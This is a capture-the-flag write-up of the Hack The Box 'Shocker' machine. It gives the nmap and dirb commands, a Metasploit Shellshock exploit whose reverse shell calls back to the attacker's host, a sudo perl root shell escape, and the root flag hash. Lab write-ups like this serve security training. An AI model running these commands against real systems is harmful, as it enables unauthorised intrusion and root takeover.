Hackthebox Shocker Writeup

0
(0)
Hackthebox Shocker Writeup

Introduction

It is a easy machine from hack the box which has more of enumeration and then finding the right exploit and privilege escalation was very easy .

Steps involved

1-Port Scan
2-Directory Enumeration
3-Checking the request
4-Exploitaion through metasploit
5-Privilage escalation

Commands involved

1-nmap -sC -sV -O -v -oV 10.10.10.56
2-dirb http://10.10.10.56
3-dirb http://10.10.10.56/cgi-bin -X .sh
4-curl -vvv http://10.10.10.56/cgi-bin/user.sh
5-use exploit/multi/http/apache_mod_cgi_bash_env_exec
6-msf exploit(apache_mod_cgi_bash_env_exec) >set rhost 10.10.10.56
7-msf exploit(apache_mod_cgi_bash_env_exec) >set lhost 10.10.14.20
8-msf exploit(apache_mod_cgi_bash_env_exec) >set targeturi /cgi-bin/user.sh
9-msf exploit(apache_mod_cgi_bash_env_exec) >run
10-sudo perl -e 'exec "/bin/sh"'

Port Scan

Nmap 7.70 scan initiated Tue Apr 21 07:52:11 2020 as: nmap -sC -sV -O -v -oV 10.10.10.56
Increasing send delay for 10.10.10.56 from 0 to 5 due to 231 out of 769 dropped probes since last increase.
Nmap scan report for 10.10.10.56
Host is up (0.28s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA) | 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA) | 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=4/21%OT=80%CT=1%CU=34478%PV=Y%DS=2%DC=I%G=Y%TM=5E9EDEB
OS:1%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=108%TI=Z%CI=I%II=I%TS=8)OPS
OS:(O1=M54DST11NW6%O2=M54DST11NW6%O3=M54DNNT11NW6%O4=M54DST11NW6%O5=M54DST1
OS:1NW6%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
OS:(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)
Uptime guess: 202.073 days (since Wed Oct 2 06:08:48 2019)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Tue Apr 21 07:53:21 2020 -- 1 IP address (1 host up) scanned in 71.12 seconds

So let’s visit the website.

Hackthebox Shocker Writeup

Nothing in the source code

<!DOCTYPE html> <html> <body> <h2>Don't Bug Me!</h2> <img src="bug.jpg" alt="bug" style="width:450px;height:350px;"> </body> </html>  

Directory enumeration

dirb http://10.10.10.56
Hackthebox Shocker Writeup

Found /cgi-bin.

But 404 on it .Let’s run dirb again

[email protected]:~/Desktop/htb/shocker# dirb http://10.10.10.56/cgi-bin -X .sh

DIRB v2.22
By The Dark Raver
START_TIME: Tue Apr 21 08:41:43 2020
URL_BASE: http://10.10.10.56/cgi-bin/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.sh) | (.sh) [NUM = 1]

GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.56/cgi-bin/ ----

And found user .sh

When curled it i found this –

[email protected]:~/Desktop/htb/shocker# curl http://10.10.10.56/cgi-bin/user.sh
Content-Type: text/plain
Just an uptime test script
08:11:17 up 16 min, 0 users, load average: 0.00, 0.00, 0.00

Checking the request

SO let’s see what the request does.

curl -vvv http://10.10.10.56/cgi-bin/user.sh
Hackthebox Shocker Writeup

Taking some hint from the name of machine.

Exploitaion through metasploit

I found a metasploit exploit against it.

Using metasploit

Hackthebox Shocker Writeup

Got the user flag and the shell.

Hackthebox Shocker Writeup

Privilege escalation

Privilege escalation is easy.

Just sudo -l that’s all.

meterpreter > shell
Process 1538 created.
Channel 2 created.
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
sudo perl 'exec "/bin/sh"'
Can't open perl script "exec "/bin/sh"": No such file or directory
sudo perl -e 'exec "/bin/sh"'
whoami
root
cat /root/root.txt
52c2715605d70c7619030560dc1ca467

How useful was this post?

Click on a star to rate it!

Average rating 0 / 5. Vote count: 0

No votes so far! Be the first to rate this post.

As you found this post useful...

Follow us on social media!

We are sorry that this post was not useful for you!

Let us improve this post!

Tell us how we can improve this post?

Leave a Comment

X
wpChatIcon
0 Shares
Tweet
Share
Share
Pin